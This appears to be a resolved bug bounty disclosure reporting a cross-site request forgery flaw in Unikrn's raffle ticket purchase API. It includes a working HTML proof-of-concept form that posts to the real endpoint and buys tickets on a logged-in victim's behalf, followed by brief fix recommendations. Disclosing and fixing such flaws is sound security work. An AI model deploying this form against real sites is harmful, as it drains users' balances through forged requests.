Loading HuntDB...

CSRF in Raffles Ticket Purchasing

High
U
Unikrn
Submitted None
Reported by tolo7010

Vulnerability Details

Technical details and impact analysis

Cross-Site Request Forgery (CSRF)
Description: ======== An API endpoint get executed with no CSRF prevention, the endpoint did not verify session_id required in the post form. An attacker can crafted malicious form (Poc), which is executed by authenticated user action leading to huge balance lost. Poc: === <!doctype html> <html> <head> </head> <body> <form action="https://unikrn.com/apiv2/raffle/enter" method="POST" name="myForm"> <input type="hidden" name="raffle" id="raffle" value="4775"> <input type="hidden" name="tickets" id="tickets" value="1"> <input type="hidden" name="session_id" id="session_id" value=""> <input value="Submit" type="submit""> </form> </body> </html> Recommendations: ============= - Implementing CSRF tokens. - Validate session_id on post form/JSON api input.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-Site Request Forgery (CSRF)